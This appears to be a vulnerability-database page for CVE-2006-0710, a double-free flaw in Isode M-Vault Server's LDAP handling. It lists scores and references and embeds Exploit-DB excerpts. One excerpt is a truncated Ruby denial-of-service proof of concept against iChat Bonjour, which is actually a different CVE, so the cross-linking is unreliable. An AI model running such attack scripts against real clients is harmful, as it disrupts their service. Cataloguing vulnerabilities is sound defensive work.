CVE-2006-0710
published 2006-02-15CVE-2006-0710: Double free vulnerability in isode.eddy in Isode M-Vault Server 11.3 allows remote attackers to execute arbitrary code via a crafted LDAP request, as…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
4.44%
90.2th percentile
Double free vulnerability in isode.eddy in Isode M-Vault Server 11.3 allows remote attackers to execute arbitrary code via a crafted LDAP request, as demonstrated by ProtoVer Sample LDAP.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| isode | m-vault_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Vulnerabilities
exploitdb·2007-01-30
CVE-2007-0710 Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Vulnerabilities
Apple iChat Bonjour 3.1.6.441 - Multiple Denial of Service Vulnerabilities
---
#!/usr/bin/ruby
# (c) 2006 Lance M. Havok
# All Rights Reserved.
# basic proof of concept for MOAB-29-01-2007
#
require 'digest/sha1'
require 'rubygems'
require 'net/dns/mdns-sd'
bugselected = (ARGV[0] || "0").to_i
TMP_ARR = []
DNSSD = Net::DNS::MDNSSD
trap("INT") {
puts "++ Exiting..."
begin
TMP_ARR.each do |o|
o.stop
end
rescue
end
exit
}
#
# This method abuses a design weakness in iChat Bonjour services, allowing an user
# to conduct a denial of service attack against reachable clients by registering multiple
# (fake) _presence records.
#
def oh_gnoes_contact_dos(status_msg = "ekoC stronS reztleS yrraL".reverse,
firstname = 'Pwnies',
lastname = 'Mgheetacek')
available_status = [ "avail", "away" ]
cur_
Exploit-DB
Isode M-Vault Server 11.3 - LDAP Memory Corruption
exploitdb·2006-02-14
CVE-2006-0710 Isode M-Vault Server 11.3 - LDAP Memory Corruption
Isode M-Vault Server 11.3 - LDAP Memory Corruption
---
source: https://www.securityfocus.com/bid/16635/info
Isode M-Vault Server is prone to a memory corruption. This issue may be triggered by malformed LDAP data.
The exact impact of this vulnerability is not known at this time. Although the issue is known to crash the server, the possibility of remote code execution is unconfirmed.
The vulnerability was reported for version 11.3 on the Linux platform; other versions and platforms may also be affected.
This vulnerability will be updated as further information is made available.
./run.py localhost 389 3102 1
No writeups or analysis indexed.
http://lists.immunitysec.com/pipermail/dailydave/2006-February/002925.htmlhttp://secunia.com/advisories/18818http://www.securityfocus.com/bid/16635http://www.vupen.com/english/advisories/2006/0567https://exchange.xforce.ibmcloud.com/vulnerabilities/24700http://lists.immunitysec.com/pipermail/dailydave/2006-February/002925.htmlhttp://secunia.com/advisories/18818http://www.securityfocus.com/bid/16635http://www.vupen.com/english/advisories/2006/0567https://exchange.xforce.ibmcloud.com/vulnerabilities/24700
2006-02-15
Published